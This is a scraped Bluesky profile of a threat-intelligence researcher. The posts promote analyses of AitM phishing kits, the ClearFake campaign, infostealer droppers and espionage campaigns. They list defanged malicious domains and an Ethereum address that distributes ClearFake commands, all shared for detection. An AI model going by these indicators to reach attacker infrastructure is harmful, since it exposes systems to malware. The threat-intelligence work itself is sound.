gregclermont's Avatar

gregclermont

@gregclermont.bsky.social

Cybercrime threat intel and detection shenanigans at Sekoia.io

53 Followers  |  34 Following  |  4 Posts  |  Joined: 05.10.2023  |  1.7119

Latest posts by gregclermont.bsky.social on Bluesky

Post image

πŸ“ Our latest #TDR report delivers an in-depth analysis of Adversary-in-the-Middle (#AitM) #phishing threats - targeting Microsoft 365 and Google accounts - and their ecosystem.

This report shares actionable intelligence to help analysts detect and investigate AitM phishing.

11.06.2025 08:32 β€” πŸ‘ 10    πŸ” 7    πŸ’¬ 1    πŸ“Œ 0

The future of security operations depends on tools that reflect a deep understanding of investigative work. Unfortunately, many AI-driven products are being built by folks with neither investigative experience nor insight into the cognitive processes underlying effective analysis

05.06.2025 16:01 β€” πŸ‘ 2    πŸ” 1    πŸ’¬ 1    πŸ“Œ 0

CTI tip: monitor transactions from the Ethereum address 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA to identify new PowerShell commands distributed by ClearFake - and block/detect any traffic to malicious domains!

As usual, feedback is greatly appreciated!

20.03.2025 18:50 β€” πŸ‘ 2    πŸ” 1    πŸ’¬ 0    πŸ“Œ 0

Here is our in-depth analysis of the latest #ClearFake variant using the Binance Smart Chain and two new ClickFix lures.

ClearFake is injected into thousands of compromised sites to distribute the #Emmental Loader, #Lumma, #Rhadamanthys, and #Vidar.

⬇️

bsky.app/profile/seko...

20.03.2025 18:50 β€” πŸ‘ 4    πŸ” 1    πŸ’¬ 1    πŸ“Œ 0
Ten Machine Requirements To Satisfy Essentials Of Joint Activity

I recently read the paper "Towards Joint Activity Design Heuristics: Essentials for Human-Machine Teaming" which I loved so much I wanted to make it easier to share. To that end, I've excerpted the Ten Heuristics from the paper here: human-machine.team with anchors for each heuristic.

07.03.2025 02:24 β€” πŸ‘ 16    πŸ” 10    πŸ’¬ 0    πŸ“Œ 0

Thank you, I love these blog posts!
Out of curiosity: do you track EpiBrowser and OneStart as belonging to this BrowserAssistant cluster that you just dropped?

24.02.2025 17:17 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

For those who did not monitor the supply chain attack against Chrome extensions in December 2024, our article provides an overview of:

- the targeted phishing attack against extension developers
- malicious code
- the adversary's infrastructure

⬇️

bsky.app/profile/seko...

22.01.2025 14:39 β€” πŸ‘ 3    πŸ” 3    πŸ’¬ 0    πŸ“Œ 0
Preview
Targeted supply chain attack against Chrome browser extensions In this blog post, learn about the supply chain attack targeting Chrome browser extensions and the associated targeted phishing campaign.

New campaign ‡️

blog.sekoia.io/targeted-sup...

23.01.2025 09:12 β€” πŸ‘ 3    πŸ” 2    πŸ’¬ 0    πŸ“Œ 0
Post image

Around 1,000 malicious domains are hosting webpages impersonating Reddit and WeTransfer, redirecting users to download password-protected archives

These archives contain an AutoIT dropper, we internally named #SelfAU3 Dropper at @sekoia.io, which executes #Lumma Stealer

IoCs ⬇️

20.01.2025 18:13 β€” πŸ‘ 9    πŸ” 6    πŸ’¬ 2    πŸ“Œ 0

25gray3cook[.]com #Mamba2FA

17.01.2025 15:07 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

Our last article exposes the new AiTM phishing kit Sneaky 2FA, sold by the cybercrime service "Sneaky Log"!

We provide an in-depth analysis of the phishing pages, the associated service, detection opportunities and multiple IoCs.

⬇️

bsky.app/profile/seko...

16.01.2025 16:44 β€” πŸ‘ 6    πŸ” 1    πŸ’¬ 1    πŸ“Œ 0
Preview
Double-Tap Campaign : Russia-nexus APT possibly related to APT28 conducts cyber espionage on Central Asia and Kazakhstan diplomatic relations Uncover the details of UAC-0063 cyberespionage campaign in Kazakhstan and its potential connection to APT28

Sekoia investigated a cyber espionage campaign using legitimate Office documents assessed to originate from the Ministry of Foreign Affairs of Kazakhstan, docs weaponized and used to collect strategic intelligence in Central Asia.
Here is the Double Tap campaign > blog.sekoia.io/double-tap-c...

13.01.2025 09:00 β€” πŸ‘ 1    πŸ” 1    πŸ’¬ 0    πŸ“Œ 0

New Mamba 2FA relay domain:
25black1cook[.]com

#Mamba2FA #AiTM #PhaaS #phishing

08.01.2025 14:19 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0
Anti-bot services used by PhaaS - Part 1 Phishing-as-a-Service (PhaaS) kits will frequently employ one or more techniques to avoid detection by security software. Often they will use a captcha like Cloudflare Turnstile, Google reCAPTCHA, or ...

Great post by rmceoin about #Adspect, the shady anti-bot service used by #Mamba2FA
rmceoin.github.io/malware-anal...

21.12.2024 22:43 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

@gregclermont is following 19 prominent accounts